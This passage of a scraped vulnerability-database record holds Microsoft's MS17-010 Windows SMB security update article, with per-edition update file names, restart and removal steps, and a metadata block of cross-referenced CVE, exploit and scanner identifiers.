</p></td> </tr> </tbody></table><p><span lang=\"EN\"> </span></p><h3><strong>Windows RT 8.1 (all editions)</strong></h3><p><strong>Reference table</strong></p><p>The following table contains the security update information for this software. </p><table class=\"table\"><tbody><tr> <td width=\"29%\"><p><strong>Deployment</strong></p></td> <td width=\"71%\"><p>The 4012216 monthly rollup update is available via <a href=\"http://go.microsoft.com/fwlink/?LinkId=21130\"><u>Windows Update</u></a> only. </p></td> </tr><tr> <td width=\"29%\"><p><strong>Restart requirement</strong></p></td> <td width=\"71%\"><p>A system restart is required after you apply this security update. </p></td> </tr><tr> <td width=\"29%\"><p><strong>Removal information</strong></p></td> <td width=\"71%\"><p>Click <strong>Control Panel</strong>, click <strong>System and Security</strong>, click <strong>Windows Update</strong>, and then under \"See also,\" click <strong>Installed updates</strong> and select from the list of updates. </p></td> </tr><tr> <td width=\"29%\"><p><strong>File information</strong></p></td> <td width=\"71%\"><p>See <a href=\"https://support.microsoft.com/kb/4012213\"><u>Microsoft Knowledge Base article 4012213</u></a></p></td> </tr> </tbody></table><h3><strong>Windows Server 2012 and Windows Server 2012 R2 (all editions)</strong></h3><p><strong>Reference table</strong></p><p>The following table contains the security update information for this software. 
</p><table class=\"table\"><tbody><tr> <td width=\"29%\"><p><strong>Security update file name</strong></p></td> <td width=\"70%\"><p>For all supported editions of Windows Server 2012:<br/><strong>Windows8-RT-KB4012214-x64.msu</strong><br/>Security only</p></td> </tr><tr> <td width=\"29%\"><p>\u00a0</p></td> <td width=\"70%\"><p>For all supported editions of Windows Server 2012:<br/><strong>Windows8-RT-KB4012217-x64.msu</strong><br/>Monthly rollup</p></td> </tr><tr> <td width=\"29%\"><p>\u00a0</p></td> <td width=\"70%\"><p>For all supported editions of Windows Server 2012 R2:<br/><strong>Windows8.1-KB4012213-x64.msu</strong><br/>Security only</p></td> </tr><tr> <td width=\"29%\"><p>\u00a0</p></td> <td width=\"70%\"><p>For all supported editions of Windows Server 2012 R2:<br/><strong>Windows8.1-KB4012216-x64.msu</strong><br/>Monthly rollup</p></td> </tr><tr> <td width=\"29%\"><p><strong>Installation switches</strong></p></td> <td width=\"70%\"><p>See <a href=\"https://support.microsoft.com/kb/934307\"><u>Microsoft Knowledge Base article 934307</u></a></p></td> </tr><tr> <td width=\"29%\"><p><strong>Restart requirement</strong></p></td> <td width=\"70%\"><p>A system restart is required after you apply this security update. </p></td> </tr><tr> <td width=\"29%\"><p><strong>Removal information</strong></p></td> <td width=\"70%\"><p>To uninstall an update installed by WUSA, use the <strong>/Uninstall</strong> setup switch or click <strong>Control Panel</strong>, click <strong>System and Security</strong>, click <strong>Windows Update</strong>, and then under \"See also,\" click <strong>Installed updates</strong> and select from the list of updates. 
</p></td> </tr><tr> <td width=\"29%\"><p><strong>File information</strong></p></td> <td width=\"70%\"><p>See <a href=\"https://support.microsoft.com/kb/4012214\"><u>Microsoft Knowledge Base article 4012214</u></a><br/>See <a href=\"https://support.microsoft.com/kb/4012217\"><u>Microsoft Knowledge Base article 4012217</u></a><br/>See <a href=\"https://support.microsoft.com/kb/4012213\"><u>Microsoft Knowledge Base article 4012213</u></a><br/>See <a href=\"https://support.microsoft.com/kb/4012216\"><u>Microsoft Knowledge Base article 4012216</u></a></p></td> </tr><tr> <td width=\"29%\"><p><strong>Registry key verification</strong></p></td> <td width=\"70%\"><p><strong>Note</strong> A registry key does not exist to validate the presence of this update. </p></td> </tr> </tbody></table><p><span lang=\"EN\"> </span></p><h3><strong>Windows 10 (all editions)</strong></h3><p><strong>Reference table</strong></p><p>The following table contains the security update information for this software. </p><table class=\"table\"><tbody><tr> <td width=\"30%\"><p><strong>Security update file name</strong></p></td> <td width=\"70%\"><p>For all supported x64-based editions of Windows 10:<br/><span><strong><span>Windows10.0-KB4012606-x64.msu</span></strong></span></p></td> </tr><tr> <td width=\"30%\"><p>\u00a0</p></td> <td width=\"70%\"><p>For all supported x64-based editions of Windows 10 Version 1511:<br/><span><strong><span>Windows10.0-KB4013198-x64.msu</span></strong></span></p></td> </tr><tr> <td width=\"30%\"><p>\u00a0</p></td> <td width=\"70%\"><p>For all supported x64-based editions of Windows 10 Version 1607:<br/><span><strong><span>Windows10.0-KB4013429-x64.msu</span></strong></span></p></td> </tr><tr> <td width=\"30%\"><p><strong>Installation switches</strong></p></td> <td width=\"70%\"><p>See <a href=\"https://support.microsoft.com/kb/934307\"><u>Microsoft Knowledge Base article 934307</u></a></p></td> </tr><tr> <td width=\"30%\"><p><strong>Restart requirement</strong></p></td> 
<td width=\"70%\"><p>A system restart is required after you apply this security update. </p></td> </tr><tr> <td width=\"30%\"><p><strong>Removal information</strong></p></td> <td width=\"70%\"><p>To uninstall an update installed by WUSA, use the <strong>/Uninstall</strong> setup switch or click <strong>Control Panel</strong>, click <strong>System and Security</strong>, click <strong>Windows Update</strong>, and then under \"See also,\" click <strong>Installed updates</strong> and select from the list of updates. </p></td> </tr><tr> <td width=\"30%\"><p><strong>File information</strong></p></td> <td width=\"70%\"><p><span>See </span><a href=\"https://support.microsoft.com/en-sg/help/12387/windows-10-update-history\" target=\"_self\"><span><u>Windows 10 and Windows Server 2016 update history</u></span></a><span>. </span></p></td> </tr><tr> <td width=\"30%\"><p><strong>Registry key verification</strong></p></td> <td width=\"70%\"><p><strong>Note</strong> A registry key does not exist to validate the presence of this update. </p></td> </tr> </tbody></table><p><span lang=\"EN\"> </span></p><h3><strong>Windows Server 2016 (all editions)</strong></h3><p><strong>Reference table</strong></p><p>The following table contains the security update information for this software. </p><table class=\"table\"><tbody><tr> <td width=\"30%\"><p><strong>Security update file name</strong></p></td> <td width=\"70%\"><p>For all supported editions of Windows Server 2016:<br/><span><strong><span>Windows10.0-KB4013429-x64.msu</span></strong></span></p></td> </tr><tr> <td width=\"30%\"><p><strong>Installation switches</strong></p></td> <td width=\"70%\"><p>See <a href=\"https://support.microsoft.com/kb/934307\"><u>Microsoft Knowledge Base article 934307</u></a></p></td> </tr><tr> <td width=\"30%\"><p><strong>Restart requirement</strong></p></td> <td width=\"70%\"><p>A system restart is required after you apply this security update. 
</p></td> </tr><tr> <td width=\"30%\"><p><strong>Removal information</strong></p></td> <td width=\"70%\"><p>To uninstall an update installed by WUSA, use the <strong>/Uninstall</strong> setup switch or click <strong>Control Panel</strong>, click <strong>System and Security</strong>, click <strong>Windows Update</strong>, and then under \"See also,\" click <strong>Installed updates</strong> and select from the list of updates. </p></td> </tr><tr> <td width=\"30%\"><p><strong>File information</strong></p></td> <td width=\"70%\"><p><span>See </span><a href=\"https://support.microsoft.com/en-sg/help/12387/windows-10-update-history\" target=\"_self\"><span><u>Windows 10 and Windows Server 2016 update history</u></span></a><span>. </span></p></td> </tr><tr> <td width=\"30%\"><p><strong>Registry key verification</strong></p></td> <td width=\"70%\"><p><strong>Note</strong> A registry key does not exist to validate the presence of this update. </p></td> </tr> </tbody></table></span><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">How to obtain help and support for this security update</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><span><div class=\"kb-collapsible kb-collapsible-collapsed\">Help for installing updates: <a href=\"https://support.microsoft.com/ph/6527\" id=\"kb-link-15\" target=\"_self\">Windows Update FAQ</a><br/><br/>Security solutions for IT professionals: <a href=\"https://technet.microsoft.com/security/bb980617.aspx\" id=\"kb-link-16\" target=\"_self\">TechNet Security Support and Troubleshooting</a><br/><br/>Help for protecting your Windows-based computer from viruses and malware: <a 
href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" id=\"kb-link-17\" target=\"_self\">Microsoft Secure</a><br/><br/>Local support according to your country: <a href=\"https://www.microsoft.com/en-us/locale.aspx\" id=\"kb-link-18\" target=\"_self\">International Support</a></div><br/></span></div></div></div><a class=\"bookmark\" id=\"fileinfo\"></a></div></body></html>", "edition": 1, "enchantments": {"dependencies": {"modified": "2021-01-01T22:39:28", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], 
"type": "symantec"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"], "type": "saint"}, {"idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"], "type": "malwarebytes"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"], "type": "avleonov"}, {"idList": ["KB4012598"], "type": "mskb"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0144", "MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", 
"1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/"], "type": "metasploit"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2021-01-01T22:39:28", "rev": 2, "value": 6.6, "vector": "NONE"}}, "hash": "ef6b7115694a138be53b122aac16e8a691361b61c8a39d4ea39de2349a569610", "hashmap": [{"hash": "ba4b35c5b6cbeae7458c44303b393638", "key": "href"}, {"hash": "140864078aeca1c7c35b4beb33c53c34", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "5f532a3fc4f1ea403f37070f59a7a53a", "key": "bulletinFamily"}, {"hash": "f96bf1d801552d52091ad0866ebdf356", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "5a498871a848d25d798ef27dcbd52a89", "key": "title"}, {"hash": "5ee5f53b9d07be79a50e7281a2bfec4e", "key": "type"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "142f691ada068c40ae71fdd0eac8502e", "key": "cvelist"}, {"hash": "3a3a69118b5452ccfeb3abf80705c731", "key": "modified"}, {"hash": "b8d2e9770277e4a8198efeee8a25dfbc", "key": "published"}], "history": [], "href": "https://support.microsoft.com/en-us/help/4013389/", "id": "KB4013389", "immutableFields": [], "lastseen": "2021-01-01T22:39:28", "modified": "2017-03-14T17:40:20", "objectVersion": "1.5", "published": 
"2017-03-14T00:00:00", "references": [], "reporter": "Microsoft", "title": "MS17-010: Security update for Windows SMB Server: March 14, 2017", "type": "mskb", "viewCount": 404}, "different_elements": ["cvss3", "cvss2"], "edition": 1, "lastseen": "2021-01-01T22:39:28"}, {"bulletin": {"bulletinFamily": "microsoft", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "description": "<html><body><p>Resolves a vulnerability in Windows that could allow remote code execution if an attacker sends specially crafted messages to a Microsoft Server Message Block 1.0 (SMBv1) server.</p><h2>Summary</h2><div class=\"kb-summary-section section\">This security update resolves vulnerabilities in Microsoft Windows. The most severe of the vulnerabilities could allow remote code execution if an attacker sends specially crafted messages to a Microsoft Server Message Block 1.0 (SMBv1) server.<br/>To learn more about the vulnerability, see <a href=\"https://technet.microsoft.com/library/security/MS17-010\" id=\"kb-link-2\" target=\"_self\">Microsoft Security Bulletin MS17-010</a>. </div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><span class=\"text-base\">Important </span><ul class=\"sbody-free_list\"><li>All future security and non-security updates for Windows RT 8.1, Windows 8.1, and Windows Server 2012 R2 require update <a href=\"https://support.microsoft.com/en-us/help/2919355\" id=\"kb-link-3\" target=\"_self\">2919355</a> to be installed. We recommend that you install update <a href=\"https://support.microsoft.com/en-us/help/2919355\" id=\"kb-link-4\" target=\"_self\">2919355</a> on your Windows RT 8.1-based, Windows 8.1-based, or Windows Server 2012 R2-based computer so that you receive future updates. </li><li>If you install a language pack after you install this update, you must reinstall this update. 
Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see <a href=\"https://technet.microsoft.com/en-us/library/hh825699\" id=\"kb-link-5\" target=\"_self\">Add language packs to Windows</a>. </li></ul></div><h2>Additional information about this security update</h2><div class=\"kb-moreinformation-section section\"><br/><div>The following articles contain more information about this security update as it relates to individual product versions. These articles may contain known issue information. </div><br/><br/><ul id=\"info1_list1\"><li><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com/kb/4012598\" managed-link=\"\" target=\"\"> 4012598</a> MS17-010: Description of the security update for Windows SMB Server: March 14, 2017</li><li><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com/kb/4012216\" managed-link=\"\" target=\"\"> 4012216</a> March 2017 Security Monthly Quality Rollup for Windows 8.1 and Windows Server 2012 R2</li><li><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com/kb/4012213\" managed-link=\"\" target=\"\"> 4012213</a> March 2017 Security Only Quality Update for Windows 8.1 and Windows Server 2012 R2</li><li><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com/kb/4012217\" managed-link=\"\" target=\"\"> 4012217</a> March 2017 Security Monthly Quality Rollup for Windows Server 2012</li><li><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com/kb/4012214\" managed-link=\"\" target=\"\"> 4012214</a> March 2017 Security Only Quality Update for Windows Server 2012</li><li><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com/kb/4012215\" managed-link=\"\" target=\"\"> 4012215</a> March 2017 Security 
Monthly Quality Rollup for Windows 7 SP1 and Windows Server 2008 R2 SP1</li><li><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com/kb/4012212\" managed-link=\"\" target=\"\"> 4012212</a> March 2017 Security Only Quality Update for Windows 7 SP1 and Windows Server 2008 R2 SP1</li><li><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com/kb/4013429\" managed-link=\"\" target=\"\"> 4013429</a> March 13, 2017\u2014KB4013429 (OS Build 933)</li><li><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com/kb/4012606\" managed-link=\"\" target=\"\"> 4012606</a> March 14, 2017\u2014KB4012606 (OS Build 17312)</li><li><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com/kb/4013198\" managed-link=\"\" target=\"\"> 4013198</a> March 14, 2017\u2014KB4013198 (OS Build 830)</li></ul></div><h2>Security update deployment</h2><span><h3><strong>Windows Vista (all editions)</strong></h3><p><strong>Reference table</strong></p><p>The following table contains the security update information for this software. 
</p><table class=\"table\"><tbody><tr> <td width=\"26%\"><p><strong>Security update file names</strong></p></td> <td width=\"73%\"><p>For all supported 32-bit editions of Windows Vista:<br/><strong>Windows6.0-KB4012598-x86.msu</strong></p></td> </tr><tr> <td width=\"26%\"><p>\u00a0</p></td> <td width=\"73%\"><p>For all supported x64-based editions of Windows Vista:<br/><strong>Windows6.0-KB4012598-x64.msu</strong></p></td> </tr><tr> <td width=\"26%\"><p><strong>Installation switches</strong></p></td> <td width=\"73%\"><p>See <a href=\"https://support.microsoft.com/kb/934307\"><span><u>Microsoft Knowledge Base article 934307</u></span></a></p></td> </tr><tr> <td width=\"26%\"><p><strong>Restart requirement</strong></p></td> <td width=\"73%\"><p>A system restart is required after you apply this security update. </p></td> </tr><tr> <td width=\"26%\"><p><strong>Removal information</strong></p></td> <td width=\"73%\"><p>WUSA.exe does not support uninstall of updates. To uninstall an update installed by WUSA, click <strong>Control Panel</strong>, and then click <strong>Security</strong>. Under \"Windows Update,\" click <strong>View installed updates</strong> and select from the list of updates. </p></td> </tr><tr> <td width=\"26%\"><p><strong>File information</strong></p></td> <td width=\"73%\"><p>See <a href=\"https://support.microsoft.com/kb/4012598\"><span><u>Microsoft Knowledge Base article 4012598</u></span></a></p></td> </tr><tr> <td width=\"26%\"><p><strong>Registry key verification</strong></p></td> <td width=\"73%\"><p><strong>Note</strong> A registry key does not exist to validate the presence of this update. </p></td> </tr> </tbody></table><p>\u00a0</p><h3><strong>Windows Server 2008 (all editions)</strong></h3><p><strong>Reference table</strong></p><p>The following table contains the security update information for this software. 
</p><table class=\"table\"><tbody><tr> <td width=\"26%\"><p><strong>Security update file names</strong></p></td> <td width=\"73%\"><p>For all supported 32-bit editions of Windows Server 2008:<br/><strong>Windows6.0-KB4012598-x86.msu</strong></p></td> </tr><tr> <td width=\"26%\"><p>\u00a0</p></td> <td width=\"73%\"><p>For all supported x64-based editions of Windows Server 2008:<br/><strong>Windows6.0-KB4012598-x64.msu</strong></p></td> </tr><tr> <td width=\"26%\"><p>\u00a0</p></td> <td width=\"73%\"><p>For all supported Itanium-based editions of Windows Server 2008:<br/><strong>Windows6.0-KB4012598-ia64.msu</strong></p></td> </tr><tr> <td width=\"26%\"><p><strong>Installation switches</strong></p></td> <td width=\"73%\"><p>See <a href=\"https://support.microsoft.com/kb/934307\"><span><u>Microsoft Knowledge Base article 934307</u></span></a></p></td> </tr><tr> <td width=\"26%\"><p><strong>Restart requirement</strong></p></td> <td width=\"73%\"><p>A system restart is required after you apply this security update. </p></td> </tr><tr> <td width=\"26%\"><p><strong>Removal information</strong></p></td> <td width=\"73%\"><p>WUSA.exe does not support uninstall of updates. To uninstall an update installed by WUSA, click <strong>Control Panel</strong>, and then click <strong>Security</strong>. Under \"Windows Update,\" click <strong>View installed updates</strong> and select from the list of updates. </p></td> </tr><tr> <td width=\"26%\"><p><strong>File information</strong></p></td> <td width=\"73%\"><p>See <a href=\"https://support.microsoft.com/kb/4012598\"><span><u>Microsoft Knowledge Base article 4012598</u></span></a></p></td> </tr><tr> <td width=\"26%\"><p><strong>Registry key verification</strong></p></td> <td width=\"73%\"><p><strong>Note</strong> A registry key does not exist to validate the presence of this update. 
</p></td> </tr> </tbody></table><p><span lang=\"EN\"> </span></p><h3><strong>Windows 7 (all editions)</strong></h3><p><strong>Reference table</strong></p><p>The following table contains the security update information for this software. </p><table class=\"table\"><tbody><tr> <td width=\"29%\"><p><strong>Security update file name</strong></p></td> <td width=\"70%\"><p>For all supported x64-based editions of Windows 7:<br/><strong>Windows6.1-KB4012212-x64.msu</strong><br/>Security only</p></td> </tr><tr> <td width=\"29%\"><p>\u00a0</p></td> <td width=\"70%\"><p>For all supported x64-based editions of Windows 7:<br/><strong>Windows6.1-KB4012215-x64.msu</strong><br/>Monthly rollup</p></td> </tr><tr> <td width=\"29%\"><p><strong>Installation switches</strong></p></td> <td width=\"70%\"><p>See <a href=\"https://support.microsoft.com/kb/934307\"><u>Microsoft Knowledge Base article 934307</u></a><span><u> </u></span></p></td> </tr><tr> <td width=\"29%\"><p><strong>Restart requirement</strong></p></td> <td width=\"70%\"><p>A system restart is required after you apply this security update. </p></td> </tr><tr> <td width=\"29%\"><p><strong>Removal information</strong></p></td> <td width=\"70%\"><p>To uninstall an update installed by WUSA, use the <strong>/Uninstall </strong>setup switch or click <strong>Control Panel</strong>, click <strong>System and Security</strong>, and then under \"Windows Update,\" click <strong>View installed updates</strong> and select from the list of updates. 
</p></td> </tr><tr> <td width=\"29%\"><p><strong>File information</strong></p></td> <td width=\"70%\"><p>See <a href=\"https://support.microsoft.com/kb/4012212\"><u>Microsoft Knowledge Base article 4012212</u></a><br/>See <a href=\"https://support.microsoft.com/kb/4012215\"><u>Microsoft Knowledge Base article 4012215</u></a></p></td> </tr><tr> <td width=\"29%\"><p><strong>Registry key verification</strong></p></td> <td width=\"70%\"><p><strong>Note</strong> A registry key does not exist to validate the presence of this update. </p></td> </tr> </tbody></table><p><span lang=\"EN\"> </span></p><h3><strong>Windows Server 2008 R2 (all editions)</strong></h3><p><strong>Reference table</strong></p><p>The following table contains the security update information for this software. </p><table class=\"table\"><tbody><tr> <td width=\"29%\"><p><strong>Security update file name</strong></p></td> <td width=\"70%\"><p>For all supported x64-based editions of Windows Server 2008 R2:<br/><strong>Windows6.1-KB4012212-x64.msu</strong><br/>Security only</p></td> </tr><tr> <td width=\"29%\"><p>\u00a0</p></td> <td width=\"70%\"><p>For all supported x64-based editions of Windows Server 2008 R2:<br/><strong>Windows6.1-KB4012215-x64.msu</strong><br/>Monthly rollup</p></td> </tr><tr> <td width=\"29%\"><p><strong>Installation switches</strong></p></td> <td width=\"70%\"><p>See <a href=\"https://support.microsoft.com/kb/934307\"><u>Microsoft Knowledge Base article 934307</u></a></p></td> </tr><tr> <td width=\"29%\"><p><strong>Restart requirement</strong></p></td> <td width=\"70%\"><p>A system restart is required after you apply this security update. 
</p></td> </tr><tr> <td width=\"29%\"><p><strong>Removal information</strong></p></td> <td width=\"70%\"><p>To uninstall an update installed by WUSA, use the <strong>/Uninstall</strong> setup switch or click <strong>Control Panel</strong>, click <strong>System and Security</strong>, and then under \"Windows Update,\" click <strong>View installed updates</strong> and select from the list of updates. </p></td> </tr><tr> <td width=\"29%\"><p><strong>File information</strong></p></td> <td width=\"70%\"><p>See <a href=\"https://support.microsoft.com/kb/4012212\"><u>Microsoft Knowledge Base article 4012212</u></a><br/>See <a href=\"https://support.microsoft.com/kb/4012215\"><u>Microsoft Knowledge Base article 4012215</u></a></p></td> </tr><tr> <td width=\"29%\"><p><strong>Registry key verification</strong></p></td> <td width=\"70%\"><p><strong>Note</strong> A registry key does not exist to validate the presence of this update. </p></td> </tr> </tbody></table><p><span lang=\"EN\"> </span></p><h3><strong>Windows 8.1 (all editions)</strong></h3><p><strong>Reference table</strong></p><p>The following table contains the security update information for this software. 
</p><table class=\"table\"><tbody><tr> <td width=\"29%\"><p><strong>Security update file name</strong></p></td> <td width=\"70%\"><p>For all supported x64-based editions of Windows 8.1:<br/><strong>Windows8.1-KB4012213-x64.msu</strong><br/>Security only</p></td> </tr><tr> <td width=\"29%\"><p>\u00a0</p></td> <td width=\"70%\"><p>For all supported x64-based editions of Windows 8.1:<br/><strong>Windows8.1-KB4012216-x64.msu</strong><br/>Monthly rollup</p></td> </tr><tr> <td width=\"29%\"><p><strong>Installation switches</strong></p></td> <td width=\"70%\"><p>See <a href=\"https://support.microsoft.com/kb/934307\"><u>Microsoft Knowledge Base article 934307</u></a></p></td> </tr><tr> <td width=\"29%\"><p><strong>Restart requirement</strong></p></td> <td width=\"70%\"><p>A system restart is required after you apply this security update. </p></td> </tr><tr> <td width=\"29%\"><p><strong>Removal information</strong></p></td> <td width=\"70%\"><p>To uninstall an update installed by WUSA, use the <strong>/Uninstall</strong> setup switch or click <strong>Control Panel</strong>, click <strong>System and Security</strong>, click <strong>Windows Update</strong>, and then under \"See also,\" click <strong>Installed updates</strong> and select from the list of updates. </p></td> </tr><tr> <td width=\"29%\"><p><strong>File information</strong></p></td> <td width=\"70%\"><p>See <a href=\"https://support.microsoft.com/kb/4012213\"><u>Microsoft Knowledge Base article 4012213</u></a><br/>See <a href=\"https://support.microsoft.com/kb/4012216\"><u>Microsoft Knowledge Base article 4012216</u></a></p></td> </tr><tr> <td width=\"29%\"><p><strong>Registry key verification</strong></p></td> <td width=\"70%\"><p><strong>Note</strong> A registry key does not exist to validate the presence of this update. 
</p></td> </tr> </tbody></table><p><span lang=\"EN\"> </span></p><h3><strong>Windows RT 8.1 (all editions)</strong></h3><p><strong>Reference table</strong></p><p>The following table contains the security update information for this software. </p><table class=\"table\"><tbody><tr> <td width=\"29%\"><p><strong>Deployment</strong></p></td> <td width=\"71%\"><p>The 4012216 monthly rollup update is available via <a href=\"http://go.microsoft.com/fwlink/?LinkId=21130\"><u>Windows Update</u></a> only. </p></td> </tr><tr> <td width=\"29%\"><p><strong>Restart requirement</strong></p></td> <td width=\"71%\"><p>A system restart is required after you apply this security update. </p></td> </tr><tr> <td width=\"29%\"><p><strong>Removal information</strong></p></td> <td width=\"71%\"><p>Click <strong>Control Panel</strong>, click <strong>System and Security</strong>, click <strong>Windows Update</strong>, and then under \"See also,\" click <strong>Installed updates</strong> and select from the list of updates. </p></td> </tr><tr> <td width=\"29%\"><p><strong>File information</strong></p></td> <td width=\"71%\"><p>See <a href=\"https://support.microsoft.com/kb/4012213\"><u>Microsoft Knowledge Base article 4012213</u></a></p></td> </tr> </tbody></table><h3><strong>Windows Server 2012 and Windows Server 2012 R2 (all editions)</strong></h3><p><strong>Reference table</strong></p><p>The following table contains the security update information for this software. 
